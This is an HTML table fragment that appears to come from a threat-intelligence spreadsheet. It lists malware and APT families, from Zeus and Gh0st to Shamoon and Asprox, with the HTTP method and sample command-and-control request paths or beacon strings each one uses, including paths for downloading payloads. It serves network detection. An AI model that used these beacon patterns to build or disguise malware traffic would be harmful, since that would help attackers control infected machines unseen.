<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Mutopy Downloader"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Mutopy Downloader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/d/conh11.jpg"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/d/conh11.jpg</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Mutopy Downloader initial callback"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Mutopy Downloader initial callback</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/protocol.php?p=3894120584&d=4fQm27CpL9m6oC7 QvLZomrXyeYvptmyetaVE2deiLdi4"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/protocol.php?p=3894120584&d=4fQm27CpL9m6oC7 QvLZomrXyeYvptmyetaVE2deiLdi4</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Symmi Remote File Injector"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Symmi Remote File Injector</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/img/seek.cgi?lin=100&db=dfs\n/ae1.php\n/ggu.php\n/wp-content/gallery/28-juli-sundsore/options.php [wordpress url - varies"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/img/seek.cgi?lin=100&db=dfs<br />/ae1.php<br />/ggu.php<br />/wp-content/gallery/28-juli-sundsore/options.php [wordpress url - varies</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Matsnu - MBR wiping ransomware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Matsnu - MBR wiping ransomware</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/inbox.php?ltype=ld&ccr=1&id=E81B90884C4C45445458 &stat=0&ver=2000803&loc=0x0409&os=Windows%20XP"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/inbox.php?ltype=ld&ccr=1&id=E81B90884C4C45445458 &stat=0&ver=2000803&loc=0x0409&os=Windows%20XP</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Adware Hotbar"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Adware Hotbar</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/vic.aspx?ver=4.0.1158.0&rnd=595937"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/vic.aspx?ver=4.0.1158.0&rnd=595937</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Blackhole v2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Blackhole v2</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2 w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a= 1f&zg=c&tn=g&jopa=1658622"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/7fc107b56efd7920/7fc107b56efd7920/q.php?kf=1f:1o:1m:2 w:1o&he=1i:31:32:1g:1n:1h:1l:1l:1n:31&a= 1f&zg=c&tn=g&jopa=1658622</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"USteal.D"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">USteal.D</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"220---------- Welcome to Pure-FTPd ----------"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">220---------- Welcome to Pure-FTPd ----------</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Hangover Smackdown Minapro"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Hangover Smackdown Minapro</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts= [PLATFORM]&mt=[account]&tr=[NoFiles]&Y1Y5F2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/flaws/snwd.php?tp=1&tg=[ID]&tv=Error[]&ts= [PLATFORM]&mt=[account]&tr=[NoFiles]&Y1Y5F2</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Cutwail / Pushdo"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cutwail / Pushdo</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?ptrxcz_VYadfikmqsuxz2469BEGILNPSUXZbe</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Mediana Proxy"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Mediana Proxy</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/index.htm?n763t4OPmrs6fXq7fXp7uj16e-r&Length=0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.htm?n763t4OPmrs6fXq7fXp7uj16e-r&Length=0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Zeus"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zeus</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/orders2010.php \n/busted.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/orders2010.php <br />/busted.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Gypthoy"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Gypthoy</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/opt/mainpage.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/opt/mainpage.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Hupigon / Graybird"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Hupigon / Graybird</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"........................................;... Windows XP 5.1 (2600.Service Pack 3).......................... ......................................$...DELLXT.................................... .................................... ........................................... 4s.love.......HACK.."]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">........................................;... Windows XP 5.1 (2600.Service Pack 3).......................... ......................................$...DELLXT.................................... .................................... ........................................... 4s.love.......HACK..</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Variant Letsgo / TabMsgSQL downloader (comment crew)"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Variant Letsgo / TabMsgSQL downloader (comment crew)</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/index.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Tapaoux"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Tapaoux</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ol/yahoo/banner4.php?jpg=../yahoo"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ol/yahoo/banner4.php?jpg=../yahoo</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Horst Proxy"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Horst Proxy</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/socks/proxy.php?ip=172.16.253.129&port= 41080&os=XP&iso=USA&smtp=0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/socks/proxy.php?ip=172.16.253.129&port= 41080&os=XP&iso=USA&smtp=0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"PassAlert"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">PassAlert</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/loader/bin/file1.exe"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/loader/bin/file1.exe</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Bitcoinminer"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Bitcoinminer</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Karagany Loader"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Karagany Loader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/user/go.php?html=do"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/user/go.php?html=do</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Gh0st"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Gh0st</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"Gh0st....d...x.Kc``....@....\\..L@:8..,39U! 1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Gh0st....d...x.Kc``....@....\..L@:8..,39U! 1</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"IXESHE"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">IXESHE</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9j OKyjnxKjQJA\nx_bigfix_client_string: baQMyZrdqDAA"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/AWS96.jsp?baQMyZrdI5Rojs9Khs9fhnjwj/8mIOm9j OKyjnxKjQJA<br />x_bigfix_client_string: baQMyZrdqDAA</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT2</span></td><td data-sheets-value="[null,2,"KoreanBanker DL"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">KoreanBanker DL</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/web/down/kbs.exe"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/web/down/kbs.exe</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Plugx"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Plugx</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"SSL - see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO4 6Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">SSL - see http://4.bp.blogspot.com/-m2u0QTwirDk/UYO4 6Pm7OOI/AAAAAAAAAFw/SG_eKhd1-Nw/s640/Untitled.png</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"PowerLoader"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">PowerLoader</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/postnuke/blog.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/postnuke/blog.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"RssFeeder (moved from TBD tab, common name still unknown) 2nd stage"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">RssFeeder (moved from TBD tab, common name still unknown) 2nd stage</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/orange/news.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/orange/news.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"RssFeeder (moved from TBD tab, common name still unknown) initialGET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">RssFeeder (moved from TBD tab, common name still unknown) initialGET</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/data/rss"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/data/rss</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Swami"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Swami</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/im/linux.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/im/linux.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"GameThief"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GameThief</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4 D468A2&os=winxp%20 Professional&avs=unknow&ps=NO.&ver=0005&pnum=16"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/xx/get.asp?mac=7641FAC9F7B2AAF71B6DE505B4 D468A2&os=winxp%20 Professional&avs=unknow&ps=NO.&ver=0005&pnum=16</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Beebone downloader"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Beebone downloader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/0/?f|-1813912965Admin\n/a/76876332/1"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/0/?f|-1813912965Admin<br />/a/76876332/1</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Neutrino EK var"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Neutrino EK var</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/cxiqocvbqd"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/cxiqocvbqd</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Comfoo / Vinself / Mspub"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Comfoo / Vinself / Mspub</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/ 12AzAONjkCYw/UD1aND43a0xiWQ161/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/BmYBcnhwJxwk/VTlaMWlnYEw12511/18688/ 12AzAONjkCYw/UD1aND43a0xiWQ161/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Destory Rat / Sogu / Thoper"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Destory Rat / Sogu / Thoper</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/update?id=000f72b8"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/update?id=000f72b8</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT2</span></td><td data-sheets-value="[null,2,"Disttrack / Shamoon"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Disttrack / Shamoon</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/ajax_modal/modal/data.asp?mydata=AA== &uid=aaa.bbb.ccc.ddd&state=3067203"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ajax_modal/modal/data.asp?mydata=AA== &uid=aaa.bbb.ccc.ddd&state=3067203</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Avatar Rootkit"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Avatar Rootkit</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/search?query=EZTFDHWP&sort=relevance http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevance"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/search?query=EZTFDHWP&sort=relevance http://groups.yahoo.com/search?query=EFS9KHRF&sort=relevance</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,3,null,9002]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">9002</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"9002..................wx....9002..................wx....9002......................."]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">9002..................wx....9002..................wx....9002.......................</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"MSWab /Yayih"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">MSWab /Yayih</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/bbs/info.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/bbs/info.asp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"ZeroAccess / Sirefef"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">ZeroAccess / Sirefef</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/stat2.php?w=65&i=58d7f947d2d1f947e5de1a07e596ae05&a=25\n/count.php?page=952000&style=LED_g&nbdigits=9"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/stat2.php?w=65&i=58d7f947d2d1f947e5de1a07e596ae05&a=25<br />/count.php?page=952000&style=LED_g&nbdigits=9</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"ZeroAccess / Sirefef ppc fraud - redirect"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">ZeroAccess / Sirefef ppc fraud - redirect</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"HTTP/1.1 302 Moved Temporarily"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">HTTP/1.1 302 Moved Temporarily</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,3,null,9002]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">9002</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/2d"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/2d</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Asprox / Kuluoz gets list of C2s"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Asprox / Kuluoz gets list of C2s</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/4213D5182A41F58F3D01D8208B0BE9633A985A4C 35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/4213D5182A41F58F3D01D8208B0BE9633A985A4C 35CE0496B63C66D43EDEC263C42FF3524188D067B0C443C0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Asprox / Kuluoz Checkin"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Asprox / Kuluoz Checkin</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/4213D5182A41F58F3D01D8208B0BE9633A985A4C 35C70A97FF61249661F38426DA71D12B40F9A512B 6C945CD85462CD565962B6C5CACB1B09F86B1651 EB971F3013D14695028FE0BEBD838B9D3C5DE002 EA95371E51B0E8CFB7567F6BF"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/4213D5182A41F58F3D01D8208B0BE9633A985A4C 35C70A97FF61249661F38426DA71D12B40F9A512B 6C945CD85462CD565962B6C5CACB1B09F86B1651 EB971F3013D14695028FE0BEBD838B9D3C5DE002 EA95371E51B0E8CFB7567F6BF</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Asprox / Kuluoz GETs spam template"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Asprox / Kuluoz GETs spam template</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/78dc91f1D56B9COC18B818A7A2B272F43O3A621C AEOC17O479E4E9A69B82"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/78dc91f1D56B9COC18B818A7A2B272F43O3A621C AEOC17O479E4E9A69B82</span></td></tr>
